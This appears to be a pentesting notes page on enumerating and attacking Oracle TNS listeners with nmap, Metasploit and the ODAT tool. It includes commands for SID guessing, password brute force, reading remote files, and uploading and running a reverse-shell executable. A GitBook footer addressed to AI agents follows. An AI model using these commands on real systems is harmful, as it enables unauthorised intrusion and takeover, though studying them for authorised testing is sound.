> For the complete documentation index, see [llms.txt](https://cybersecnotes.gitbook.io/welcome/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://cybersecnotes.gitbook.io/welcome/network-services/port-1521-1522-1529-oracle-tns-listener.md). # Port 1521,1522-1529 - Oracle TNS Listener ## Enumeration ### Basic ```bash nmap --script "oracle-tns-version" -p 1521 -T4 -sV msf> use auxiliary/scanner/oracle/tnslsnr_version #apt install tnscmd10g tnscmd10g version -p 1521 -h ``` ## ODAT **ODAT** (Oracle Database Attacking Tool) is an open source **penetration testing** tool that tests the security of **Oracle Databases remotely**. Usage examples of ODAT: * You have an Oracle database listening remotely and want to find valid **SIDs** and **credentials** in order to connect to the database * You have a valid Oracle account on a database and want to **escalate your privileges** to become DBA or SYSDBA * You have a Oracle account and you want to **execute system commands** (e.g. **reverse shell**) in order to move forward on the operating system hosting the database Tested on Oracle Database **10g**, **11g**, **12c**, **18c** and **19c**. {% embed url="" %} ### Instalation ```bash git clone https://github.com/quentinhardy/odat.git cd odat/ git submodule init git submodule update ``` * Get instant client basic, sdk (devel) and sqlplus from the Oracle web site: * X64: * X86: ``` sudo apt-get install libaio1 python3-dev alien python3-pip pip3 install cx_Oracle mv /home/kali/downloads/*.rm . sudo alien --to-deb *.rpm dpgk -i * ``` Add to .zshrc ```bash export ORACLE_HOME=/usr/lib/oracle/19.3/client64/ export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib export PATH=${ORACLE_HOME}bin:$PATH ``` ### Usage examples {% code overflow="wrap" %} ```python # SID Enumeration python3 odat.py sidguesser -s # User/Pass bruteforce python3 odat.py passwordguesser -s -d python3 odat.py passwordguesser -s --accounts-file -d # Get remote/put files python3 odat.py utlfile --getFile 'C:/Windows/System32/drivers/etc' hosts hosts -s -d -U -P [--sysdba] python3 odat.py utlfile --putFile 'C:/Windows/System32' rev.exe rev.exe -s -d -U -P [--sysdba] # Execute remote file python3 odat.py externaltable --exec 'C:/Windows/System32' rev.exe ``` {% endcode %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://cybersecnotes.gitbook.io/welcome/network-services/port-1521-1522-1529-oracle-tns-listener.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.